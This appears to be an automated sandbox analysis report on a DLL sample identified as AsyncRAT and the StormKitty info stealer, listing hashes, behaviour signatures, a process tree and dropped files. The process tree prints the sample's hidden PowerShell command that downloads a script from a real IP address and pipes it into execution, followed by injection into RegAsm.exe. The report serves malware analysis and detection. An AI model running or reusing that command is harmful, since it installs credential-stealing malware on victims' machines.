Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2025 01:08
Static task
static1
Behavioral task
behavioral1
Sample
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll
Resource
win7-20240903-en
General
-
Target
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll
-
Size
88KB
-
MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8
-
SHA1
109e32187254b27e04ef18bbe1b48fad42bca841
-
SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
-
SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
SSDEEP
1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/1424-40-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 4640 powershell.exe 16 4640 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4640 powershell.exe -
Downloads MZ/PE file
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4640 set thread context of 1424 4640 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 1424 RegAsm.exe 1424 RegAsm.exe 1424 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 1424 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1424 RegAsm.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 392 wrote to memory of 3472 392 regsvr32.exe 83 PID 392 wrote to memory of 3472 392 regsvr32.exe 83 PID 392 wrote to memory of 3472 392 regsvr32.exe 83 PID 3472 wrote to memory of 3224 3472 regsvr32.exe 84 PID 3472 wrote to memory of 3224 3472 regsvr32.exe 84 PID 3472 wrote to memory of 3224 3472 regsvr32.exe 84 PID 3224 wrote to memory of 4640 3224 cmd.exe 86 PID 3224 wrote to memory of 4640 3224 cmd.exe 86 PID 3224 wrote to memory of 4640 3224 cmd.exe 86 PID 4640 wrote to memory of 4300 4640 powershell.exe 87 PID 4640 wrote to memory of 4300 4640 powershell.exe 87 PID 4640 wrote to memory of 4300 4640 powershell.exe 87 PID 4300 wrote to memory of 1272 4300 csc.exe 88 PID 4300 wrote to memory of 1272 4300 csc.exe 88 PID 4300 wrote to memory of 1272 4300 csc.exe 88 PID 4640 wrote to memory of 1176 4640 powershell.exe 89 PID 4640 wrote to memory of 1176 4640 powershell.exe 89 PID 4640 wrote to memory of 1176 4640 powershell.exe 89 PID 4640 wrote to memory of 1872 4640 powershell.exe 90 PID 4640 wrote to memory of 1872 4640 powershell.exe 90 PID 4640 wrote to memory of 1872 4640 powershell.exe 90 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91 PID 4640 wrote to memory of 1424 4640 powershell.exe 91
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll1⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\roinylul\roinylul.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9848.tmp" "c:\Users\Admin\AppData\Local\Temp\roinylul\CSC4057B3816DAB43138C8A71EC24F58DAF.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1272
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:1176
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:1872
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1424
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5436815586d37e623d81105889acd2d9c
SHA1325c549c4660499e4fc7626e25fc5626b0f62ee4
SHA2560a2b061bc3cf7774b083f1c1b010b1a59ab84be6d1b5160b893c352204119a37
SHA5127f025f846326e2930c810f21e822b514860c25a04236d1687d14c5fa76ae665e2c2f097bcc8f564fa05f04a1d418df720567b31121d7eea240bac2ab5319aae4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5317fe0489beb05e99ca76d7ab8f602a4
SHA12531803b719e927ebe43805c263c86a71fe69259
SHA256754e05253d7e8749073c63993508154cfad57b1d61358df6230fbb2230e0418d
SHA512b6e6bff766e94fae0b61385d30731617967d5cebdb78dabe4fff4ee0cc475ee10728ffdf957349445961b1ac641089a67ba146615fab7cd162f4681a4516d008
-
Filesize
652B
MD5bc71b004ff6a6ee90a1b96f3366c79c1
SHA17e957569bd83900b9bacec6ad0e1653586b83a9f
SHA256f52c2bf30392c2656bd0bb7659c7ce3f8226bb95ff1c66169da03076c229aaf5
SHA51251070c920c5ddb159e8808667cc9c9c6343773f8eb95e7a000b7f73f43d15234b632e460af7537d037701274d5e78e888889c7530b6d355050d128e69303dbfe
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD58bf6a75fee2ec57dbc471c6ecf89ce64
SHA132235d825f6928cd549e78011fc0a757be2416b8
SHA256ff9df7f263ba8d6c0cc120406084b5c8ed9dbc23b74861bd453e25d348f01b44
SHA5126bd6ae91d33633a01e20f91492800d40ea5bef413bd47920f1a9296433a6def225a7658138ec5551110ee2decfc5611ee9c93b2976050f555cafd8b9ebe98745